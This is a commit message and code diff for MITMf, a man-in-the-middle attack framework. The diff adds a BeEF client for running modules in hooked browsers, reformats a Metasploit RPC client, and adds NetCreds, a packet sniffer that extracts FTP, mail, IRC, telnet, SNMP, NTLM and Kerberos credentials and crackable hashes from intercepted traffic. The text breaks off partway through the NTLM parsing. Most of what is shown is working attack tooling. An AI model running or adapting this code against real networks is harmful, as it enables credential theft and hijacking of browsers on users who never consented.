This is 1/2 of the work done... lot's of cool stuff!

I've re-written a decent amount of the framework to support dynamic config file updates, revamped the ARP Spoofing 'engine' and changed the way MITMf integrates Responder and Netcreds.

- Net-creds is now started by default and no longer a plugin.. It's all about getting those creds after all.
- Integrated the Subterfuge Framework's ARPWatch script, it will enable itself when spoofing the whole subnet (also squashed bugs in the original ARP spoofing code)
- The spoof plugin now supports specifying a range of targets (e.g. --target 10.10.10.1-15) and multiple targets (e.g. --target 10.10.10.1,10.10.10.2)
- An SMB Server is now started by default, MITMf now uses Impacket's SMBserver as supposed to the one built into Responder, mainly for 2 reasons:
  1) Impacket is moving towards SMB2 support and is actively developed
  2) Impacket's SMB server is fully functional as supposed to Responder's (will be adding a section for it in the config file)
  3) Responder's SMB server was unrealiable when used through MITMf (After spending a day trying to figure out why, I just gave up and yanked it out)

- Responder's code has been broken down into single importable classes (way easier to manage and read, ugh!)
- Started adding dynamic config support to Responder's code and changed the logging messages to be a bit more readable.
- POST data captured through the proxy will now only be logged and printed to STDOUT when it's decodable to UTF-8 (this prevents logging encrypted data which is no use)
- Responder and the Beefapi script are no longer submodules (they seem to be a pain to package, so i removed them to help a brother out)
- Some plugins are missing because I'm currently re-writing them, will be added later
- Main plugin class now inharates from the ConfigWatcher class, this way plugins will support dynamic configs natively! \o/

core/beefapi

@@ -1 +0,0 @@
-Subproject commit 28d2fef986e217425cb621701f267e40425330c4

core/beefapi.py

@@ -0,0 +1,171 @@
+#!/usr/bin/env python
+import requests
+import json
+import logging
+from random import sample
+from string import lowercase, digits
+
+logging.getLogger("requests").setLevel(logging.WARNING)  #Disables "Starting new HTTP Connection (1)" log message
+
+class BeefAPI:
+
+	def __init__(self, opts=[]):
+		self.host = "127.0.0.1" or opts.get(host)
+		self.port = "3000" or opts.get(port)
+		self.token = None
+		self.url = "http://%s:%s/api/" % (self.host, self.port)
+		self.login_url = self.url + "admin/login"
+		self.hookurl = self.url + "hooks?token="
+		self.mod_url = self.url + "modules?token="
+		self.log_url = self.url + "logs?token="
+
+	def random_url(self):
+		return "".join(sample(digits + lowercase, 8))
+
+	def login(self, username, password):
+		try:
+			auth = json.dumps({"username": username, "password": password})
+			r = requests.post(self.login_url, data=auth)
+			data = r.json()
+
+			if (r.status_code == 200) and (data["success"]):
+				self.token = data["token"]  #Auth token
+				return True
+			elif r.status_code != 200:
+				return False
+
+		except Exception, e:
+			print "beefapi ERROR: %s" % e
+
+	def sessions_online(self):
+		return self.get_sessions("online", "session")
+
+	def sessions_offline(self):
+		return self.get_sessions("offline", "session")
+
+	def session2host(self, session):
+		return self.conversion(session, "ip")
+
+	def session2id(self, session):
+		return self.conversion(session, "id")
+
+	def hook_info(self, hook):  #Returns parsed information on a session
+		session = self.conversion(hook, "session")
+		url = self.hookurl + self.token
+		r = requests.get(url).json()
+
+		try:
+			states = ["online", "offline"]
+			for state in states:
+				for v in r["hooked-browsers"][state].items():
+					if v[1]["session"] == session:
+						return v[1]
+		except IndexError:
+			pass
+
+	def hook_info_all(self, hook):
+		session = self.conversion(hook, "session")
+		url = self.url + "hooks/%s?token=%s" % (session, self.token)
+		return requests.get(url).json()
+
+	def hook_logs(self, hook):
+		session = self.conversion(hook, "session")
+		url = self.url + "logs/%s?token=%s" % (session, self.token)
+		return requests.get(url).json()
+
+	def hosts_online(self):
+		return self.get_sessions("online", "ip")
+
+	def hosts_offline(self):
+		return self.get_sessions("offline", "ip")
+
+	def host2session(self, host):
+		return self.conversion(host, "session")
+
+	def host2id(self, host):
+		return self.conversion(host, "id")
+
+	def ids_online(self):
+		return self.get_sessions("online", "id")
+
+	def ids_offline(self):
+		return self.get_sessions("offline", "id")
+
+	def id2session(self, id):
+		return self.conversion(id, "session")
+
+	def id2host(self, id):
+		return self.conversion(id, "ip")
+
+	def module_id(self, name):  #Returns module id
+		url = self.mod_url + self.token
+		try:
+			r = requests.get(url).json()
+			for v in r.values():
+				if v["name"] == name:
+					return v["id"]
+		except Exception, e:
+			print "beefapi ERROR: %s" % e
+
+	def module_name(self, id):  #Returns module name
+		url = self.mod_url + self.token
+		try:
+			r = requests.get(url).json()
+			for v in r.values():
+				if v["id"] == id:
+					return v["name"]
+		except Exception, e:
+			print "beefapi ERROR: %s" % e
+
+	def module_run(self, hook, mod_id, options={}):  #Executes a module on a specified session
+		try:
+			session = self.conversion(hook, "session")
+			headers = {"Content-Type": "application/json", "charset": "UTF-8"}
+			payload = json.dumps(options)
+			url = self.url + "modules/%s/%s?token=%s" % (session, mod_id, self.token)
+			return requests.post(url, headers=headers, data=payload).json()
+		except Exception, e:
+			print "beefapi ERROR: %s" % e
+
+	def module_results(self, hook, mod_id, cmd_id):
+		session = self.conversion(hook, "session")
+		url = self.mod_url + "%s/%s/%s?token=%s" % (session, mod_id, cmd_id, self.token)
+		return requests.get(url).json()
+
+	def modules_list(self):
+		return requests.get(self.mod_url + self.token).json()
+
+	def module_info(self, id):
+		url = self.url + "modules/%s?token=%s" % (id, self.token)
+		return requests.get(url).json()
+
+	def logs(self):
+		return requests.get(self.log_url + self.token).json()
+
+	def conversion(self, value, return_value):  #Helper function for all conversion functions 
+		url = self.hookurl + self.token
+		try:
+			r = requests.get(url).json()
+			states = ["online", "offline"]
+			for state in states:
+				for v in r["hooked-browsers"][state].items():
+					for r in v[1].values():
+						if str(value) == str(r):
+							return v[1][return_value]
+
+		except Exception, e:
+			print "beefapi ERROR: %s" % e
+
+		except IndexError:
+			pass
+
+	def get_sessions(self, state, value):  #Helper function
+		try:
+			hooks = []
+			r = requests.get(self.hookurl + self.token).json()
+			for v in r["hooked-browsers"][state].items():
+				hooks.append(v[1][value])
+
+			return hooks
+		except Exception, e:
+			print "beefapi ERROR: %s" % e

core/configwatcher.py

@@ -1,13 +1,12 @@
 #! /usr/bin/env python2.7
 
 import logging
-
-logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages
 from watchdog.observers import Observer
 from watchdog.events import FileSystemEventHandler
-
 from configobj import ConfigObj
 
+logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages
+
 mitmf_logger = logging.getLogger('mitmf')
 
 class ConfigWatcher(FileSystemEventHandler):

core/msfrpc.py

@@ -20,66 +20,69 @@
 # USA
 #
 
-import requests
 import msgpack
+import logging
+import requests
+
+logging.getLogger("requests").setLevel(logging.WARNING)  #Disables "Starting new HTTP Connection (1)" log message
 
 class Msfrpc:
 
-	class MsfError(Exception):
-		def __init__(self,msg):
-			self.msg = msg
-		def __str__(self):
-			return repr(self.msg)
+    class MsfError(Exception):
+        def __init__(self,msg):
+            self.msg = msg
+        def __str__(self):
+            return repr(self.msg)
 
-	class MsfAuthError(MsfError):
-		def __init__(self,msg):
-			self.msg = msg
-	
-	def __init__(self,opts=[]):
-		self.host = opts.get('host') or "127.0.0.1"
-		self.port = opts.get('port') or "55552"
-		self.uri = opts.get('uri') or "/api/"
-		self.ssl = opts.get('ssl') or False
-		self.token = None
-		self.headers = {"Content-type" : "binary/message-pack"}
+    class MsfAuthError(MsfError):
+        def __init__(self,msg):
+            self.msg = msg
+    
+    def __init__(self,opts=[]):
+        self.host = opts.get('host') or "127.0.0.1"
+        self.port = opts.get('port') or "55552"
+        self.uri = opts.get('uri') or "/api/"
+        self.ssl = opts.get('ssl') or False
+        self.token = None
+        self.headers = {"Content-type" : "binary/message-pack"}
 
-	def encode(self, data):
-		return msgpack.packb(data)
+    def encode(self, data):
+        return msgpack.packb(data)
 
-	def decode(self, data):
-		return msgpack.unpackb(data)
+    def decode(self, data):
+        return msgpack.unpackb(data)
 
-	def call(self, method, opts=[]):
-		if method != 'auth.login':
-			if self.token == None:
-				raise self.MsfAuthError("MsfRPC: Not Authenticated")
+    def call(self, method, opts=[]):
+        if method != 'auth.login':
+            if self.token == None:
+                raise self.MsfAuthError("MsfRPC: Not Authenticated")
 
-		if method != "auth.login":
-			opts.insert(0, self.token)
+        if method != "auth.login":
+            opts.insert(0, self.token)
 
-		if self.ssl == True:
-			url = "https://%s:%s%s" % (self.host, self.port, self.uri)
-		else:
-			url = "http://%s:%s%s" % (self.host, self.port, self.uri)
-	
+        if self.ssl == True:
+            url = "https://%s:%s%s" % (self.host, self.port, self.uri)
+        else:
+            url = "http://%s:%s%s" % (self.host, self.port, self.uri)
+    
 
-		opts.insert(0, method)
-		payload = self.encode(opts)
+        opts.insert(0, method)
+        payload = self.encode(opts)
 
-		r = requests.post(url, data=payload, headers=self.headers)
+        r = requests.post(url, data=payload, headers=self.headers)
 
-		opts[:] = [] #Clear opts list
-		
-		return self.decode(r.content)
+        opts[:] = [] #Clear opts list
+        
+        return self.decode(r.content)
 
-	def login(self, user, password):
-		auth = self.call("auth.login", [user, password])
-		try:
-			if auth['result'] == 'success':
-				self.token = auth['token']
-				return True
-		except:
-			raise self.MsfAuthError("MsfRPC: Authentication failed")
+    def login(self, user, password):
+        auth = self.call("auth.login", [user, password])
+        try:
+            if auth['result'] == 'success':
+                self.token = auth['token']
+                return True
+        except:
+            raise self.MsfAuthError("MsfRPC: Authentication failed")
 
 if __name__ == '__main__':
   

core/netcreds/NetCreds.py

@@ -0,0 +1,907 @@
+#!/usr/bin/env python2
+
+import logging
+import binascii
+import struct
+import base64
+import threading
+import binascii
+
+from os import geteuid, devnull
+from sys import exit
+from urllib import unquote
+from collections import OrderedDict
+from BaseHTTPServer import BaseHTTPRequestHandler
+from StringIO import StringIO
+from urllib import unquote
+
+# shut up scapy
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
+from scapy.all import *
+conf.verb=0
+
+mitmf_logger = logging.getLogger('mitmf')
+
+DN = open(devnull, 'w')
+pkt_frag_loads = OrderedDict()
+challenge_acks = OrderedDict()
+mail_auths = OrderedDict()
+telnet_stream = OrderedDict()
+
+# Regexs
+authenticate_re = '(www-|proxy-)?authenticate'
+authorization_re = '(www-|proxy-)?authorization'
+ftp_user_re = r'USER (.+)\r\n'
+ftp_pw_re = r'PASS (.+)\r\n'
+irc_user_re = r'NICK (.+?)((\r)?\n|\s)'
+irc_pw_re = r'NS IDENTIFY (.+)'
+irc_pw_re2 = 'nickserv :identify (.+)'
+mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)'
+mail_auth_re1 =  '(\d+ )?login '
+NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+'
+NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
+# Prone to false+ but prefer that to false-
+http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
+
+class NetCreds:
+
+    def sniffer(self, myip, interface):
+        #set the filter to our ip to prevent capturing traffic coming/going from our box
+        sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(myip), store=0)
+        #sniff(iface=interface, prn=pkt_parser, store=0)
+
+    def start(self, myip, interface):
+        t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, myip,))
+        t.setDaemon(True)
+        t.start()
+
+def pkt_parser(pkt):
+    '''
+    Start parsing packets here
+    '''
+    global pkt_frag_loads, mail_auths
+
+    if pkt.haslayer(Raw):
+        load = pkt[Raw].load
+
+    # Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
+    if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
+        return
+
+    # UDP
+    if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
+
+        src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
+        dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
+
+        # SNMP community strings
+        if pkt.haslayer(SNMP):
+            parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP])
+            return
+
+        # Kerberos over UDP
+        decoded = Decode_Ip_Packet(str(pkt)[14:])
+        kerb_hash = ParseMSKerbv5UDP(decoded['data'][8:])
+        if kerb_hash:
+            printer(src_ip_port, dst_ip_port, kerb_hash)
+
+    # TCP
+    elif pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
+
+        ack = str(pkt[TCP].ack)
+        seq = str(pkt[TCP].seq)
+        src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
+        dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
+        frag_remover(ack, load)
+        pkt_frag_loads[src_ip_port] = frag_joiner(ack, src_ip_port, load)
+        full_load = pkt_frag_loads[src_ip_port][ack]
+
+        # Limit the packets we regex to increase efficiency
+        # 750 is a bit arbitrary but some SMTP auth success pkts
+        # are 500+ characters
+        if 0 < len(full_load) < 750:
+
+            # FTP
+            ftp_creds = parse_ftp(full_load, dst_ip_port)
+            if len(ftp_creds) > 0:
+                for msg in ftp_creds:
+                    printer(src_ip_port, dst_ip_port, msg)
+                return
+
+            # Mail
+            mail_creds_found = mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq)
+
+            # IRC
+            irc_creds = irc_logins(full_load, pkt)
+            if irc_creds != None:
+                printer(src_ip_port, dst_ip_port, irc_creds)
+                return
+
+            # Telnet
+            telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
+
+        # HTTP and other protocols that run on TCP + a raw load
+        other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt)
+
+def frag_remover(ack, load):
+    '''
+    Keep the FILO OrderedDict of frag loads from getting too large
+    3 points of limit:
+        Number of ip_ports < 50
+        Number of acks per ip:port < 25
+        Number of chars in load < 5000
+    '''
+    global pkt_frag_loads
+
+    # Keep the number of IP:port mappings below 50
+    # last=False pops the oldest item rather than the latest
+    while len(pkt_frag_loads) > 50:
+        pkt_frag_loads.popitem(last=False)
+
+    # Loop through a deep copy dict but modify the original dict
+    copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
+    for ip_port in copy_pkt_frag_loads:
+        if len(copy_pkt_frag_loads[ip_port]) > 0:
+            # Keep 25 ack:load's per ip:port
+            while len(copy_pkt_frag_loads[ip_port]) > 25:
+                pkt_frag_loads[ip_port].popitem(last=False)
+
+    # Recopy the new dict to prevent KeyErrors for modifying dict in loop
+    copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
+    for ip_port in copy_pkt_frag_loads:
+        # Keep the load less than 75,000 chars
+        for ack in copy_pkt_frag_loads[ip_port]:
+            # If load > 5000 chars, just keep the last 200 chars
+            if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
+                pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
+
+def frag_joiner(ack, src_ip_port, load):
+    '''
+    Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
+    '''
+    for ip_port in pkt_frag_loads:
+        if src_ip_port == ip_port:
+            if ack in pkt_frag_loads[src_ip_port]:
+                # Make pkt_frag_loads[src_ip_port][ack] = full load
+                old_load = pkt_frag_loads[src_ip_port][ack]
+                concat_load = old_load + load
+                return OrderedDict([(ack, concat_load)])
+
+    return OrderedDict([(ack, load)])
+
+def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
+    '''
+    Catch telnet logins and passwords
+    '''
+    global telnet_stream
+
+    msg = None
+
+    if src_ip_port in telnet_stream:
+        # Do a utf decode in case the client sends telnet options before their username
+        # No one would care to see that
+        try:
+            telnet_stream[src_ip_port] += load.decode('utf8')
+        except UnicodeDecodeError:
+            pass
+
+        # \r or \r\n or \n terminate commands in telnet if my pcaps are to be believed
+        if '\r' in telnet_stream[src_ip_port] or '\n' in telnet_stream[src_ip_port]:
+            telnet_split = telnet_stream[src_ip_port].split(' ', 1)
+            cred_type = telnet_split[0]
+            value = telnet_split[1].replace('\r\n', '').replace('\r', '').replace('\n', '')
+            # Create msg, the return variable
+            msg = 'Telnet %s: %s' % (cred_type, value)
+            printer(src_ip_port, dst_ip_port, msg)
+            del telnet_stream[src_ip_port]
+
+    # This part relies on the telnet packet ending in
+    # "login:", "password:", or "username:" and being <750 chars
+    # Haven't seen any false+ but this is pretty general
+    # might catch some eventually
+    # maybe use dissector.py telnet lib?
+    if len(telnet_stream) > 100:
+        telnet_stream.popitem(last=False)
+    mod_load = load.lower().strip()
+    if mod_load.endswith('username:') or mod_load.endswith('login:'):
+        telnet_stream[dst_ip_port] = 'username '
+    elif mod_load.endswith('password:'):
+        telnet_stream[dst_ip_port] = 'password '
+
+def ParseMSKerbv5TCP(Data):
+    '''
+    Taken from Pcredz because I didn't want to spend the time doing this myself
+    I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
+    Maybe replace this eventually with the kerberos python lib
+    Parses Kerberosv5 hashes from packets
+    '''
+    try:
+        MsgType = Data[21:22]
+        EncType = Data[43:44]
+        MessageType = Data[32:33]
+    except IndexError:
+        return
+
+    if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
+        if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
+            HashLen = struct.unpack('<b',Data[50:51])[0]
+            if HashLen == 54:
+                Hash = Data[53:105]
+                SwitchHash = Hash[16:]+Hash[0:16]
+                NameLen = struct.unpack('<b',Data[153:154])[0]
+                Name = Data[154:154+NameLen]
+                DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
+                Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
+                BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+                return 'MS Kerberos: %s' % BuildHash
+
+        if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
+            HashLen = struct.unpack('<b',Data[47:48])[0]
+            Hash = Data[48:48+HashLen]
+            SwitchHash = Hash[16:]+Hash[0:16]
+            NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
+            Name = Data[HashLen+97:HashLen+97+NameLen]
+            DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
+            Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
+            BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+            return 'MS Kerberos: %s' % BuildHash
+
+        else:
+            Hash = Data[48:100]
+            SwitchHash = Hash[16:]+Hash[0:16]
+            NameLen = struct.unpack('<b',Data[148:149])[0]
+            Name = Data[149:149+NameLen]
+            DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
+            Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
+            BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+            return 'MS Kerberos: %s' % BuildHash
+
+def ParseMSKerbv5UDP(Data):
+    '''
+    Taken from Pcredz because I didn't want to spend the time doing this myself
+    I should probably figure this out on my own but hey, time isn't free why reinvent the wheel?
+    Maybe replace this eventually with the kerberos python lib
+    Parses Kerberosv5 hashes from packets
+    '''
+
+    try:
+        MsgType = Data[17:18]
+        EncType = Data[39:40]
+    except IndexError:
+        return
+
+    if MsgType == "\x0a" and EncType == "\x17":
+        try:
+            if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
+                HashLen = struct.unpack('<b',Data[41:42])[0]
+                if HashLen == 54:
+                    Hash = Data[44:96]
+                    SwitchHash = Hash[16:]+Hash[0:16]
+                    NameLen = struct.unpack('<b',Data[144:145])[0]
+                    Name = Data[145:145+NameLen]
+                    DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
+                    Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
+                    BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+                    return 'MS Kerberos: %s' % BuildHash
+
+                if HashLen == 53:
+                    Hash = Data[44:95]
+                    SwitchHash = Hash[16:]+Hash[0:16]
+                    NameLen = struct.unpack('<b',Data[143:144])[0]
+                    Name = Data[144:144+NameLen]
+                    DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
+                    Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
+                    BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+                    return 'MS Kerberos: %s' % BuildHash
+
+            else:
+                HashLen = struct.unpack('<b',Data[48:49])[0]
+                Hash = Data[49:49+HashLen]
+                SwitchHash = Hash[16:]+Hash[0:16]
+                NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
+                Name = Data[HashLen+98:HashLen+98+NameLen]
+                DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
+                Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
+                BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+                return 'MS Kerberos: %s' % BuildHash
+        except struct.error:
+            return
+
+def Decode_Ip_Packet(s):
+    '''
+    Taken from PCredz, solely to get Kerb parsing
+    working until I have time to analyze Kerb pkts
+    and figure out a simpler way
+    Maybe use kerberos python lib
+    '''
+    d={}
+    d['header_len']=ord(s[0]) & 0x0f
+    d['data']=s[4*d['header_len']:]
+    return d
+
+def double_line_checker(full_load, count_str):
+    '''
+    Check if count_str shows up twice
+    '''
+    num = full_load.lower().count(count_str)
+    if num > 1:
+        lines = full_load.count('\r\n')
+        if lines > 1:
+            full_load = full_load.split('\r\n')[-2] # -1 is ''
+    return full_load
+
+def parse_ftp(full_load, dst_ip_port):
+    '''
+    Parse out FTP creds
+    '''
+    print_strs = []
+
+    # Sometimes FTP packets double up on the authentication lines
+    # We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
+    full_load = double_line_checker(full_load, 'USER')
+
+    # FTP and POP potentially use idential client > server auth pkts
+    ftp_user = re.match(ftp_user_re, full_load)
+    ftp_pass = re.match(ftp_pw_re, full_load)
+
+    if ftp_user:
+        msg1 = 'FTP User: %s' % ftp_user.group(1).strip()
+        print_strs.append(msg1)
+        if dst_ip_port[-3:] != ':21':
+            msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
+            print_strs.append(msg2)
+
+    elif ftp_pass:
+        msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip()
+        print_strs.append(msg1)
+        if dst_ip_port[-3:] != ':21':
+            msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
+            print_strs.append(msg2)
+
+    return print_strs
+
+def mail_decode(src_ip_port, dst_ip_port, mail_creds):
+    '''
+    Decode base64 mail creds
+    '''
+    try:
+        decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
+        decoded = decoded.replace('\x00', ' ')
+    except TypeError:
+        decoded = None
+    except UnicodeDecodeError as e:
+        decoded = None
+
+    if decoded != None:
+        msg = 'Decoded: %s' % decoded
+        printer(src_ip_port, dst_ip_port, msg)
+
+def mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq):
+    '''
+    Catch IMAP, POP, and SMTP logins
+    '''
+    # Handle the first packet of mail authentication
+    # if the creds aren't in the first packet, save it in mail_auths
+
+    # mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]
+    global mail_auths
+    found = False
+
+    # Sometimes mail packets double up on the authentication lines
+    # We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
+    full_load = double_line_checker(full_load, 'auth')
+
+    # Client to server 2nd+ pkt
+    if src_ip_port in mail_auths:
+        if seq in mail_auths[src_ip_port][-1]:
+            stripped = full_load.strip('\r\n')
+            try:
+                decoded = base64.b64decode(stripped)
+                msg = 'Mail authentication: %s' % decoded
+                printer(src_ip_port, dst_ip_port, msg)
+            except TypeError:
+                pass
+            mail_auths[src_ip_port].append(ack)
+
+    # Server responses to client
+    # seq always = last ack of tcp stream
+    elif dst_ip_port in mail_auths:
+        if seq in mail_auths[dst_ip_port][-1]:
+            # Look for any kind of auth failure or success
+            a_s = 'Authentication successful'
+            a_f = 'Authentication failed'
+            # SMTP auth was successful
+            if full_load.startswith('235') and 'auth' in full_load.lower():
+                # Reversed the dst and src
+                printer(dst_ip_port, src_ip_port, a_s)
+                found = True
+                try:
+                    del mail_auths[dst_ip_port]
+                except KeyError:
+                    pass
+            # SMTP failed
+            elif full_load.startswith('535 '):
+                # Reversed the dst and src
+                printer(dst_ip_port, src_ip_port, a_f)
+                found = True
+                try:
+                    del mail_auths[dst_ip_port]
+                except KeyError:
+                    pass
+            # IMAP/POP/SMTP failed
+            elif ' fail' in full_load.lower():
+                # Reversed the dst and src
+                printer(dst_ip_port, src_ip_port, a_f)
+                found = True
+                try:
+                    del mail_auths[dst_ip_port]
+                except KeyError:
+                    pass
+            # IMAP auth success
+            elif ' OK [' in full_load:
+                # Reversed the dst and src
+                printer(dst_ip_port, src_ip_port, a_s)
+                found = True
+                try:
+                    del mail_auths[dst_ip_port]
+                except KeyError:
+                    pass
+
+            # Pkt was not an auth pass/fail so its just a normal server ack
+            # that it got the client's first auth pkt
+            else:
+                if len(mail_auths) > 100:
+                    mail_auths.popitem(last=False)
+                mail_auths[dst_ip_port].append(ack)
+
+    # Client to server but it's a new TCP seq
+    # This handles most POP/IMAP/SMTP logins but there's at least one edge case
+    else:
+        mail_auth_search = re.match(mail_auth_re, full_load, re.IGNORECASE)
+        if mail_auth_search != None:
+            auth_msg = full_load
+            # IMAP uses the number at the beginning
+            if mail_auth_search.group(1) != None:
+                auth_msg = auth_msg.split()[1:]
+            else:
+                auth_msg = auth_msg.split()
+            # Check if its a pkt like AUTH PLAIN dvcmQxIQ==
+            # rather than just an AUTH PLAIN
+            if len(auth_msg) > 2:
+                mail_creds = ' '.join(auth_msg[2:])
+                msg = 'Mail authentication: %s' % mail_creds
+                printer(src_ip_port, dst_ip_port, msg)
+
+                mail_decode(src_ip_port, dst_ip_port, mail_creds)
+                try:
+                    del mail_auths[src_ip_port]
+                except KeyError:
+                    pass
+                found = True
+
+            # Mail auth regex was found and src_ip_port is not in mail_auths
+            # Pkt was just the initial auth cmd, next pkt from client will hold creds
+            if len(mail_auths) > 100:
+                mail_auths.popitem(last=False)
+            mail_auths[src_ip_port] = [ack]
+
+        # At least 1 mail login style doesn't fit in the original regex:
+        #     1 login "username" "password"
+        # This also catches FTP authentication!
+        #     230 Login successful.
+        elif re.match(mail_auth_re1, full_load, re.IGNORECASE) != None:
+
+            # FTP authentication failures trigger this
+            #if full_load.lower().startswith('530 login'):
+            #    return
+
+            auth_msg = full_load
+            auth_msg = auth_msg.split()
+            if 2 < len(auth_msg) < 5:
+                mail_creds = ' '.join(auth_msg[2:])
+                msg = 'Authentication: %s' % mail_creds
+                printer(src_ip_port, dst_ip_port, msg)
+                mail_decode(src_ip_port, dst_ip_port, mail_creds)
+                found = True
+
+    if found == True:
+        return True
+
+def irc_logins(full_load, pkt):
+    '''
+    Find IRC logins
+    '''
+    user_search = re.match(irc_user_re, full_load)
+    pass_search = re.match(irc_pw_re, full_load)
+    pass_search2 = re.search(irc_pw_re2, full_load.lower())
+    if user_search:
+        msg = 'IRC nick: %s' % user_search.group(1)
+        return msg
+    if pass_search:
+        msg = 'IRC pass: %s' % pass_search.group(1)
+        return msg
+    if pass_search2:
+        msg = 'IRC pass: %s' % pass_search2.group(1)
+        return msg
+
+def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
+    '''
+    Pull out pertinent info from the parsed HTTP packet data
+    '''
+    user_passwd = None
+    http_url_req = None
+    method = None
+    http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
+    http_line, header_lines, body = parse_http_load(full_load, http_methods)
+    headers = headers_to_dict(header_lines)
+    if 'host' in headers:
+        host = headers['host']
+    else:
+        host = ''
+
+    #if http_line != None:
+    #    method, path = parse_http_line(http_line, http_methods)
+    #    http_url_req = get_http_url(method, host, path, headers)
+        #if http_url_req != None:
+            #printer(src_ip_port, None, http_url_req)
+
+    # Print search terms
+    searched = get_http_searches(http_url_req, body, host)
+    if searched:
+        printer(src_ip_port, dst_ip_port, searched)
+
+    #We dont need this cause its being taking care of by the proxy
+    
+    #Print user/pwds
+    #if body != '':
+    #    user_passwd = get_login_pass(body)
+    #    if user_passwd != None:
+    #        try:
+    #            http_user = user_passwd[0].decode('utf8')
+    #            http_pass = user_passwd[1].decode('utf8')
+    #            # Set a limit on how long they can be prevent false+
+    #            if len(http_user) > 75 or len(http_pass) > 75:
+    #                return
+    #            user_msg = 'HTTP username: %s' % http_user
+    #            printer(src_ip_port, dst_ip_port, user_msg)
+    #            pass_msg = 'HTTP password: %s' % http_pass
+    #            printer(src_ip_port, dst_ip_port, pass_msg)
+    #        except UnicodeDecodeError:
+    #           pass
+
+    # Print POST loads
+    # ocsp is a common SSL post load that's never interesting
+    #if method == 'POST' and 'ocsp.' not in host:
+    #    try:
+    #        msg = 'POST load: %s' % body.encode('utf8')
+    #        printer(src_ip_port, None, msg)
+    #    except UnicodeDecodeError:
+    #        pass
+
+    # Kerberos over TCP
+    decoded = Decode_Ip_Packet(str(pkt)[14:])
+    kerb_hash = ParseMSKerbv5TCP(decoded['data'][20:])
+    if kerb_hash:
+        printer(src_ip_port, dst_ip_port, kerb_hash)
+
+    # Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL)
+    NTLMSSP2 = re.search(NTLMSSP2_re, full_load, re.DOTALL)
+    NTLMSSP3 = re.search(NTLMSSP3_re, full_load, re.DOTALL)
+    if NTLMSSP2:
+        parse_ntlm_chal(NTLMSSP2.group(), ack)
+    if NTLMSSP3:
